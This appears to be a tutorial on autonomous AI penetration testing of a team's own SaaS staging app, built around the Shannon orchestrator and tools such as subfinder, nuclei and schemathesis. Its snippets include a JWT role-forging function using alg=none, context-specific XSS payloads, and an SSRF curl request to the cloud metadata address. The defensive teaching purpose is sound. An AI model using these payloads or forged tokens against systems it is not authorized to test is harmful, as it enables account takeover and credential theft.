
Secure a Web App with Autonomous AI Penetration Testing

Run a full AI-driven penetration test on a web application — from subdomain discovery through exploitation to a report with proof-of-concept exploits — using Shannon and supporting security tools.

Tags: DevOps, pentesting, ai-security, autonomous, vulnerability, owasp
Works with: claude-code, openai-codex, gemini-cli, cursor

The Problem

Dani's team ships code twice a week to their SaaS platform — a Node.js API with a React frontend serving 5,000 users. Their last professional penetration test was 9 months ago and cost $15,000. Since then, they've added 40+ API endpoints, integrated a payment system, and launched a webhook feature that fetches user-provided URLs. They know they need another pentest, but the budget isn't there for another manual engagement, and they can't afford to wait. Every deploy is a potential new vulnerability shipping to production.

Dani wants to run a comprehensive penetration test this week — not a surface-level vulnerability scan, but actual exploitation attempts that prove whether vulnerabilities are real. The test needs to cover the OWASP Top 10, produce a report with reproducible proof-of-concept exploits, and integrate into CI so future deploys are tested automatically.

The Solution

Use ai-pentesting (Shannon) as the autonomous orchestrator, supported by subfinder for subdomain discovery, whatweb for technology fingerprinting, nmap-recon for port scanning, nuclei-scanner for known CVE detection, schemathesis for API fuzzing, and xss-detection and ssrf-detection techniques for targeted exploitation. The AI agent coordinates all tools, analyzes results, decides what to exploit, and generates a professional report.

Step-by-Step Walkthrough

Step 1: Map the Attack Surface

Before testing anything, understand what exists. The attack surface includes not just the main application but every subdomain, every port, and every API endpoint.

Start with subdomain enumeration using subfinder. Even for a single-domain SaaS, there are often forgotten subdomains — staging environments with debug mode enabled, old API versions with known vulnerabilities, internal tools accidentally exposed. Subfinder queries certificate transparency logs, DNS datasets, and other passive sources without touching the target infrastructure.

Run the results through whatweb to fingerprint every live host. For each subdomain, identify the web server (Nginx 1.24, Node.js 18), backend framework (Express, Next.js), and any exposed technologies (Redis admin panel, Kibana dashboard). This tells the AI pentester which attack techniques are most likely to succeed — finding a WordPress installation means testing for plugin vulnerabilities, finding an Express API means testing for prototype pollution and NoSQL injection.

Then run nmap against all live hosts to find open ports beyond HTTP. Common findings: Redis on port 6379 without auth, MongoDB on 27017 accessible from the internet, debug ports left open (Node.js inspector on 9229). These aren't web vulnerabilities, but they're often the easiest path to compromise.
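The idea nmap automates can be sketched as a plain TCP connect scan. This is a simplified illustration, not nmap itself; the host and port list below are hypothetical examples of the high-value non-HTTP ports mentioned above.

```python
import socket

# Illustrative map of risky non-HTTP ports and why they matter.
RISKY_PORTS = {
    6379: "Redis (often unauthenticated)",
    27017: "MongoDB",
    9229: "Node.js inspector (debug port)",
}

def connect_scan(host, ports):
    """Return the subset of `ports` that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.5)
            if s.connect_ex((host, port)) == 0:  # 0 means connected
                open_ports.append(port)
    return open_ports

for port in connect_scan("127.0.0.1", RISKY_PORTS):
    print(f"OPEN {port}: {RISKY_PORTS[port]}")
```

In practice you would run nmap with service detection against every live host from the subdomain list; the sketch only shows why an open 6379 or 9229 is worth flagging.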

The combined output — subdomains, technologies, and open ports — gives the AI a complete map to plan its attack strategy.

Step 2: Scan for Known Vulnerabilities

Before investing time in manual exploitation, check for low-hanging fruit. Run nuclei with templates for known CVEs, default credentials, and common misconfigurations. Nuclei has thousands of templates maintained by the security community — it can find things like exposed .env files, open admin panels, outdated jQuery with known XSS, or servers vulnerable to published CVEs.

For the API specifically, run schemathesis against the OpenAPI spec. Schemathesis generates thousands of test cases from the schema — boundary values, invalid types, oversized payloads, special characters — and fires them at every endpoint. It finds crashes (500 errors), schema violations (response doesn't match spec), and slow responses (potential DoS vectors) that human testers rarely discover because they don't test exhaustively.
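The kind of case generation schemathesis performs can be sketched from a single parameter's schema. This is a toy illustration of the idea, not schemathesis's API; the schema keys follow OpenAPI conventions, but the payload choices are hypothetical.

```python
def fuzz_cases(param_schema):
    """Yield adversarial values for one parameter based on its declared schema."""
    t = param_schema.get("type")
    if t == "integer":
        lo = param_schema.get("minimum", -2**31)
        hi = param_schema.get("maximum", 2**31 - 1)
        # Boundary values straddling the declared range, plus a type violation.
        yield from (lo - 1, lo, hi, hi + 1, "not-a-number")
    elif t == "string":
        max_len = param_schema.get("maxLength", 256)
        yield ""                          # empty input
        yield "A" * (max_len + 1)         # oversized payload
        yield "';--"                      # SQL metacharacters
        yield "\x00\n\r"                  # control characters
        yield "http://169.254.169.254/"   # SSRF probe for URL-ish fields

print(list(fuzz_cases({"type": "integer", "minimum": 1, "maximum": 100})))
```

Schemathesis does this exhaustively across every parameter of every endpoint in the spec, which is exactly the coverage a human tester skips.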

Focus schemathesis on the payment and webhook endpoints — these handle the most sensitive data and the most complex input validation. If the webhook endpoint accepts a URL parameter and schemathesis gets a 500 error with a specially crafted URL, that's a strong SSRF indicator for the AI to investigate further.

Step 3: AI-Guided Exploitation

This is where autonomous AI pentesting shines. Feed the reconnaissance data and scan results into Shannon (or a custom AI pipeline). The AI analyzes all findings and decides what to exploit first, based on:

  • Likelihood of exploitation: a 500 error on an endpoint that feeds user input into SQL is more promising than a minor header misconfiguration
  • Impact: An auth bypass on the admin API is critical; a reflected XSS in a 404 page is low
  • Effort: Known CVE with public exploit code is faster than discovering a novel vulnerability
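The triage heuristic above can be sketched as a simple score, ranking each finding by likelihood and impact discounted by effort. The weights and sample findings are hypothetical, not Shannon's actual model.

```python
def priority(finding):
    """Higher score = exploit first: likely, high-impact, and cheap to attempt."""
    return finding["likelihood"] * finding["impact"] / finding["effort"]

findings = [
    {"name": "500 on SQL-backed search param", "likelihood": 0.7, "impact": 9, "effort": 2},
    {"name": "missing X-Frame-Options header", "likelihood": 0.9, "impact": 2, "effort": 1},
    {"name": "known CVE with public exploit",  "likelihood": 0.8, "impact": 8, "effort": 1},
]

for f in sorted(findings, key=priority, reverse=True):
    print(f"{priority(f):5.2f}  {f['name']}")
```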

The AI agent starts with the highest-priority targets. For the webhook endpoint that accepts URLs, it tests for SSRF — can it reach the AWS metadata service at 169.254.169.254? Can it access internal services on the private network? It tries filter bypasses: IP encoding (0x7f000001 for 127.0.0.1), DNS rebinding, protocol smuggling. If any bypass works, the agent captures the exact request and response as proof.
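The IP-encoding bypass works because many textual spellings normalize to the same address, so a blocklist that matches strings ("127.0.0.1", "169.254.169.254") misses encoded forms. A minimal sketch using Python's standard library:

```python
import ipaddress

def normalize(host):
    """Resolve alternate IP spellings (hex, decimal) to canonical dotted-quad."""
    try:
        # int(..., 0) accepts "0x7f000001" (hex) and "2130706433" (decimal).
        return str(ipaddress.ip_address(int(host, 0)))
    except ValueError:
        pass
    return str(ipaddress.ip_address(host))  # raises if not an IP literal

print(normalize("0x7f000001"))       # 127.0.0.1, hex-encoded loopback
print(normalize("2130706433"))       # 127.0.0.1, decimal-encoded loopback
print(normalize("169.254.169.254"))  # AWS metadata service address
```

A safe webhook fetcher should apply exactly this normalization (plus DNS resolution) before checking the destination against an allowlist; the agent tests whether the target skipped that step.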

For the authentication system, the agent tests for broken access control: can a regular user reach admin endpoints by reusing their own token, or by tampering with the user ID claim in a JWT whose signature isn't properly verified (alg=none, weak signing secrets)? Can they escalate privileges by modifying role fields in the profile update? The AI reasons about the application's auth model based on the source code (white-box testing) and crafts specific exploitation attempts.
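The JWT-tampering probe can be sketched with the standard library alone. The token and claim names below are hypothetical, and the forged token only succeeds if the server skips signature verification (for example, by accepting alg=none).

```python
import base64
import json

def b64url_decode(part):
    # JWTs strip base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")

def tamper_role(token, new_role):
    """Decode the payload (no key needed just to read it), flip the role claim."""
    header, payload, _sig = token.split(".")
    claims = json.loads(b64url_decode(payload))
    claims["role"] = new_role
    forged = b64url_encode(json.dumps(claims).encode())
    return f"{header}.{forged}."  # empty signature: the alg=none probe

# Hypothetical demo token for a regular user.
demo = ".".join([
    b64url_encode(b'{"alg":"none","typ":"JWT"}'),
    b64url_encode(b'{"sub":"user-42","role":"user"}'),
    "",
])
print(tamper_role(demo, "admin"))
```

If a request with the forged token reaches an admin endpoint, that request/response pair becomes the proof-of-concept in the report.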

For XSS, the agent identifies all input points (search, comments, user profile fields) and tests each in context. It doesn't just fire generic payloads — it analyzes where the input appears in the response (HTML body, attribute, JavaScript context, URL) and selects the appropriate bypass technique. When it finds a working XSS, it demonstrates impact: session cookie theft, keylogging, or phishing overlay.
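Context-aware payload selection can be sketched as a crude classifier over where the reflected marker lands in the response. The contexts and payloads here are illustrative, not an exhaustive bypass catalog.

```python
# One plausible payload per injection context (illustrative examples).
PAYLOADS = {
    "html_body": "<img src=x onerror=alert(document.domain)>",
    "attribute": '" autofocus onfocus=alert(1) x="',
    "js_string": "';alert(1);//",
}

def detect_context(html, marker):
    """Crude guess at the injection context from what precedes the marker."""
    before = html[:html.find(marker)]
    if before.count("<script") > before.count("</script"):
        return "js_string"   # reflected inside inline JavaScript
    if before.endswith("='") or before.endswith('="'):
        return "attribute"   # reflected inside a quoted attribute value
    return "html_body"       # reflected as plain markup

for sample in ('<input value="XMARK">',
               "<script>var q='XMARK'</script>",
               "<p>You searched for XMARK</p>"):
    ctx = detect_context(sample, "XMARK")
    print(f"{ctx:10} -> {PAYLOADS[ctx]}")
```

A real agent inspects the DOM and response headers rather than prefix strings, but the principle is the same: the payload must match the context, or the browser never executes it.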

Each exploitation attempt is recorded with the full request, response, and a curl command that reproduces it. No false positives — every finding in the report has a working proof-of-concept.

Step 4: Generate the Report

The AI compiles all findings into a structured penetration test report. Each vulnerability includes:

  • Severity rating with CVSS score
  • Affected endpoint and parameter
  • Step-by-step reproduction using curl or browser
  • Screenshot or response body showing the exploit working
  • Impact description (what an attacker could do)
  • Remediation guidance specific to the codebase
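One plausible shape for a report entry, mirroring the fields above; Shannon's actual report schema may differ, and the example finding is hypothetical.

```python
from dataclasses import dataclass

@dataclass
class Finding:
    title: str
    severity: str       # Critical / High / Medium / Low
    cvss: float
    endpoint: str
    parameter: str
    reproduction: str   # curl command or browser steps
    impact: str
    remediation: str

    def to_markdown(self):
        return (
            f"## {self.title} ({self.severity}, CVSS {self.cvss})\n\n"
            f"**Endpoint:** `{self.endpoint}`, parameter `{self.parameter}`\n\n"
            f"**Reproduce:** {self.reproduction}\n\n"
            f"**Impact:** {self.impact}\n\n"
            f"**Remediation:** {self.remediation}\n"
        )

example = Finding(
    title="SSRF in webhook URL fetcher",
    severity="Critical",
    cvss=9.1,
    endpoint="POST /api/webhooks",
    parameter="url",
    reproduction="curl -X POST https://staging.example.com/api/webhooks "
                 "-d 'url=http://169.254.169.254/latest/meta-data/'",
    impact="Attacker reads cloud metadata, including IAM credentials",
    remediation="Resolve and validate destination IPs against an allowlist before fetching",
)
print(example.to_markdown())
```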

The executive summary prioritizes by risk: critical findings that need immediate patches (auth bypass, SQL injection, SSRF to metadata), high findings for the next sprint (stored XSS, missing rate limiting), and medium findings for the backlog (security header improvements, verbose error messages).

Step 5: Integrate into CI/CD

After fixing the findings, set up automated pentesting in the CI pipeline. Every push to main triggers a pentest against the freshly deployed staging environment. The pipeline:

  1. Deploys the app to a temporary staging environment
  2. Runs the AI pentest with a focused scope (30-minute time limit for CI)
  3. Uploads the report as a build artifact
  4. Fails the build if any critical or high severity vulnerabilities are found
  5. Sends a Slack notification with the summary
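Step 4's gate can be sketched as a small script. The JSON report shape (a "findings" list with severity and title) is an assumption here, since the real artifact format depends on the tool.

```python
import json

BLOCKING = {"critical", "high"}

def gate(report):
    """Return 1 (fail the build) if any blocking finding exists, else 0."""
    blocking = [f for f in report["findings"]
                if f["severity"].lower() in BLOCKING]
    for f in blocking:
        print(f"BLOCKING: [{f['severity']}] {f['title']}")
    return 1 if blocking else 0

# Example: parse the uploaded report artifact and gate on it.
report = json.loads(
    '{"findings": [{"severity": "Critical", "title": "SSRF to metadata service"}]}'
)
exit_code = gate(report)
print("build", "FAILED" if exit_code else "passed")
```

In CI this would run as the final step, with the script's exit code deciding whether the pipeline goes red.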

For weekly scheduled runs (not gated on deploy), the pentest runs with the full scope — comprehensive recon, maximum fuzzing intensity, and complete exploitation attempts. This catches regressions and new attack surface that appeared during the week.

Real-World Example

Dani, a lead developer at a 20-person SaaS startup, runs their first AI-driven pentest against their staging environment on a Monday morning. The full pipeline completes in 2 hours — less time than it takes to write the SOW for a manual engagement.

  1. Subfinder discovers 12 subdomains, including a forgotten staging.api.example.com with debug mode enabled
  2. WhatWeb fingerprints all live hosts — the staging API is running an outdated Express version with known prototype pollution CVE
  3. Nuclei finds 3 exposed .env files and an open Redis instance on port 6379
  4. Schemathesis fuzzes 40 API endpoints and triggers 500 errors on 6 of them with special characters
  5. Shannon's AI agent chains the findings: the webhook endpoint has SSRF that leaks AWS IAM credentials from the metadata service, a broken access control bug lets any user read other users' payment data, and a stored XSS in the support ticket system fires when an admin views it

The team fixes all 3 critical findings in 48 hours. The CI integration catches a regression the following week — a new endpoint missing authorization checks. Total cost: ~$30 in API usage per full pentest. Security gap between deploys drops from 6+ months to zero.

Related Skills

  • nmap-recon — Network port scanning and service detection for the reconnaissance phase
  • nuclei-scanner — Template-based vulnerability scanning for known CVEs and misconfigurations
  • owasp-zap — Web application security scanner for comprehensive vulnerability assessment
  • security-audit — Code-level security scanning for OWASP Top 10 vulnerabilities